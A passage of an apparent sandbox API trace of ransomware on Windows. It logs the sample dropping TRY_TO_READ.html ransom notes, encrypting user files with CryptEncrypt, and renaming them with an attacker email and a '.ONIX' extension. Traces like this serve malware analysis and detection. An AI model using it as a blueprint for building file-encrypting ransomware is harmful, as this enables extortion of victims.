ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Websites", cAlternateFileName="MICROS~1")) returned 1 [0121.321] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0121.324] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0121.324] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0121.327] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32860770, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0121.327] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0121.327] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0121.329] FindNextFileW (in: hFindFile=0x48ee70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 0 [0121.329] CloseHandle (hObject=0x3cc) returned 1 [0121.329] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.330] GetSystemTime (in: lpSystemTime=0x2a0400 | out: lpSystemTime=0x2a0400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x7, wSecond=0x0, wMilliseconds=0x2c6)) [0121.330] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2b0000 [0121.330] GetWindowsDirectoryW (in: lpBuffer=0x2b0000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0121.330] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2b0200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2b0600, lpMaximumComponentLength=0x2b0608, lpFileSystemFlags=0x2b0604, lpFileSystemNameBuffer=0x2b0400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2b0600*=0x9c354b42, lpMaximumComponentLength=0x2b0608*=0xff, lpFileSystemFlags=0x2b0604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0121.330] wsprintfW (in: param_1=0x2a0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links9c354ca09c354b444c.lock") returned 59 [0121.330] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links9c354ca09c354b444c.lock" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0121.331] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.331] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.331] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x50) returned 0x45b428 [0121.331] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48eeb0 [0121.331] FindNextFileW (in: hFindFile=0x48eeb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x32860770, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x32860770, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0121.331] FindNextFileW (in: hFindFile=0x48eeb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0121.331] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b4 [0121.331] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.332] LockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x244, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.332] SetFilePointerEx (in: hFile=0x4b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.332] ReadFile (in: hFile=0x4b4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.332] SetFilePointerEx (in: hFile=0x4b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.332] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.333] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.333] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.333] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", dwFileAttributes=0x80) returned 1 [0121.333] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned 48 [0121.333] GetProcessHeap () returned 0x410000 [0121.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd0) returned 0x477600 [0121.333] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" [0121.333] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.333] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=580) returned 1 [0121.333] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x244 [0121.333] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.333] GetProcessHeap () returned 0x410000 [0121.333] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.333] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.333] WriteFile (in: hFile=0x4b4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.341] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.342] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.343] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x244) returned 0x46a0f0 [0121.343] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x244) returned 0x4dab68 [0121.343] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.343] ReadFile (in: hFile=0x4b4, lpBuffer=0x46a0f0, nNumberOfBytesToRead=0x244, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesRead=0x367f44c*=0x244, lpOverlapped=0x0) returned 1 [0121.343] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.343] WriteFile (in: hFile=0x4b4, lpBuffer=0x4dab68*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesWritten=0x367f44c*=0x244, lpOverlapped=0x0) returned 1 [0121.344] UnlockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x244, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.345] CloseHandle (hObject=0x4b4) returned 1 [0121.345] GetProcessHeap () returned 0x410000 [0121.345] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.345] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.347] GetProcessHeap () returned 0x410000 [0121.347] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.347] FindNextFileW (in: hFindFile=0x48eeb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0121.347] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b4 [0121.348] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.348] LockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1e6, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.349] SetFilePointerEx (in: hFile=0x4b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0121.349] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.349] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.349] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.349] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", dwFileAttributes=0x80) returned 1 [0121.349] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned 48 [0121.349] GetProcessHeap () returned 0x410000 [0121.349] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd0) returned 0x477600 [0121.349] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" [0121.349] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.349] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=486) returned 1 [0121.349] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1e6 [0121.349] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.349] GetProcessHeap () returned 0x410000 [0121.349] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.349] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.349] WriteFile (in: hFile=0x4b4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.354] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.355] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.356] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6) returned 0x442938 [0121.356] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1e6) returned 0x46a0f0 [0121.356] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.356] ReadFile (in: hFile=0x4b4, lpBuffer=0x442938, nNumberOfBytesToRead=0x1e6, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x442938*, lpNumberOfBytesRead=0x367f44c*=0x1e6, lpOverlapped=0x0) returned 1 [0121.356] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-486, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.356] WriteFile (in: hFile=0x4b4, lpBuffer=0x46a0f0*, nNumberOfBytesToWrite=0x1e6, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesWritten=0x367f44c*=0x1e6, lpOverlapped=0x0) returned 1 [0121.357] UnlockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1e6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.357] CloseHandle (hObject=0x4b4) returned 1 [0121.357] GetProcessHeap () returned 0x410000 [0121.357] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8c88 | out: hHeap=0x410000) returned 1 [0121.357] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.359] GetProcessHeap () returned 0x410000 [0121.359] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.359] FindNextFileW (in: hFindFile=0x48eeb0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0121.359] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4b4 [0121.360] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.360] LockFile (hFile=0x4b4, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x3a1, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.360] SetFilePointerEx (in: hFile=0x4b4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.360] ReadFile (in: hFile=0x4b4, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.361] SetFilePointerEx (in: hFile=0x4b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.361] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.362] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8b80 | out: pbBuffer=0x4d8b80) returned 1 [0121.362] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2780 | out: pbBuffer=0x4b2780) returned 1 [0121.362] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", dwFileAttributes=0x80) returned 1 [0121.362] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned 50 [0121.362] GetProcessHeap () returned 0x410000 [0121.362] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4) returned 0x44faf8 [0121.362] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" [0121.362] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.362] GetFileSizeEx (in: hFile=0x4b4, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=929) returned 1 [0121.362] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x3a1 [0121.362] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.362] GetProcessHeap () returned 0x410000 [0121.362] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8c88 [0121.362] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8c88*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.362] WriteFile (in: hFile=0x4b4, lpBuffer=0x4d8c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8c88*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.365] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.366] WriteFile (in: hFile=0x4b4, lpBuffer=0x4b2780*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2780*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3a1) returned 0x4dab68 [0121.367] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x3a1) returned 0x4daf18 [0121.367] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.367] ReadFile (in: hFile=0x4b4, lpBuffer=0x4dab68, nNumberOfBytesToRead=0x3a1, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dab68*, lpNumberOfBytesRead=0x367f44c*=0x3a1, lpOverlapped=0x0) returned 1 [0121.367] SetFilePointer (in: hFile=0x4b4, lDistanceToMove=-929, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.368] WriteFile (in: 